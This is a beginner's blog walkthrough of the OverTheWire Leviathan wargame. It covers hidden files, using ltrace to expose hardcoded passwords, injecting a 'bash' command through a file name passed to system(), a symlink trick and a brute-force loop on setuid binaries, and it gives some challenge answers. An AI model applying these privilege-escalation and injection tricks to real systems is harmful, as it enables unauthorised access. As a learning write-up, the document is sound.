OverTheWire-Leviathan

6 min readMay 16, 2021

Hello People,

Today we will take a look at Leviathan at OverTheWire. This is an easy wargame that revolves around basic Linux commands. This wargame is a place where we can apply everything we have learned from bandit. Let’s jump right in!

Level 0 -> Level 1

At Level 0, we can “SSH” into the machine with the username “leviathan0” and the password “leviathan0”. So we use the command “ssh leviathan0@leviathan.labs.overthewire.org -p 2223”. The terminal will then prompt us for the password, which will then give us access to the machine. Now unlike bandit, in this wargame, there are no hints, so we’re on our own. So let’s look around and see what we can find. We run the command “pwd” and see that we are in “/home/leviathan0” directory. On running “ls”, we don’t see any directory. Interesting. We again run the same command with 2 new flags “ls -la”. This command basically lists the hidden directories and files. We see a directory called “backup”. We “cd” into the directory and a “bookmarks.html” file. We open the file and search for the password hoping we find it here. We can run the command “cat bookmarks.html | grep pass” search the file for password and voila! We find the password.

Level 1 -> Level 2

We can ssh with leviathan1’s credentials with the command mentioned above. Here we again list contents in the current directory with the “ls” command and see a file called “Check”. This file is highlighted in red, which means it a setuid binary. We can find that out by running the “file check” command. “Setuid binaries” are files that run with admin privileges. So when we execute the file, we can execute it with root privileges. These are usually used as privilege escalation vectors. So we can run the file to see what it does with the command “./check”. When we run the binary, it prompts us to enter a password. We can enter leviathan1’s password but it says “wrong password”. This means that we need to find a key that we can enter with the binary, and it will give the password for the next level. We can view the contents of the binary but it’s all gibberish. Here we can use a command called “ltrace” which when run with a binary, will intercept every system call, function call and display every parameter a function can take. This will help us understand the binary a little better. So let’s try running the command “ltrace ./check”. Initially, you’ll only see the first two lines. You have to keep pressing the enter key to see more lines. Now here we see a “Strcmp” function that takes in a string and compares it to “sex”. We enter the word when the binary prompts us for a password and it accepts it! Now it gives us a shell. Let’s try to retrieve the password from “/etc/leviathan_pass” directory. And we get the password!

Level 2 -> Level 3

On this level, we have another setuid binary called “printfile”. We run the binary, and as the name suggests, it prints a file.

Let’s try to access the “/etc/leviathan_pass/leviathan3" file. Looks like we can’t access the file. We can try “/etc/pass” since it’s readable by all users.

We can see that the program is using the “access” method to check if we have the permissions to read the file. It then passes our string, which in this case is the file path to “snprintf” which generates the command to be executed. This method then passes the command to “system()” where it is executed. This is a very basic understanding of what the program is doing. Please read the man pages of each of these functions to understand them better. So we can see that the access() method is used to check for permissions and then execute the operation, which in this case is print the contents of the file. So to get the password for leviathan3, we can do the following:

Here we create a file followed by the command “bash”. Since there is no proper validation, we are having the system() method execute multiple commands. Now since this is a suid binary, it will execute “bash” with leviathan3’s permissions and we get the shell as leviathan3. We can now view the password file for the user. Now, I’ll admit that this level was a bit challenging for me and I had to go around looking for some help since I’m also still learning.

Level 3 -> Level 4

Here on the home page, there is a setuid binary with the name “level3”. We run the binary and see that it is asking us for a password. We can try leviathan3’s password but it doesn’t work. Let’s run “ltrace” again and see what get. It prompts us for the password again. Let’s enter the same password.

We can see that the program is comparing our password to “snlprintf”. We can try this password and it works! We are now leviathan4. We can now view the password for leviathan4.

Level 4 -> Level 5

On running “ls” command, no file or directories show up. So we list all files with the command “ls -la”. We see a “.trash” directory. We move in to this directory and see a setuid binary with the name “bin”. We execute the file with the command “./bin” and it displays a binary output.

This could be the password converted to binary. We can use this decoder to convert this binary output to string and voila! It gives us the password for the next level.

Level 5 -> Level 6

We can see there’s another setuid binary in the home directory with the name “leviathan5”. We can the binary and it displays the message “Cannot find /tmp/file.log”. We can try to create this file. Let’s do it.

So we can create and write to this file. Let’s try to copy the contents of the file “/etc/leviathan_pass/leviathan6" but it will tell us that we don’t have the permissions to do that. We can create a symbolic link to that file. So let’s do that. Now we can run the binary again and we see the password! Sweet!

Level 6 -> Level 7

On this level, we have a setuid binary with the name “leviathan6” in the home directory. We run the binary and it asks us to supply a 4 digit code. So we need to brute force the binary to find the correct code.

So we use the code “for i in $(seq 0000 9999); do ./leviathan6 $i ; done”. A number of “Wrong” messages will be displayed until the correct code is found. We then get a shell. We can run “whoami” and see that we are leviathan7. We can now retrieve the user’s password.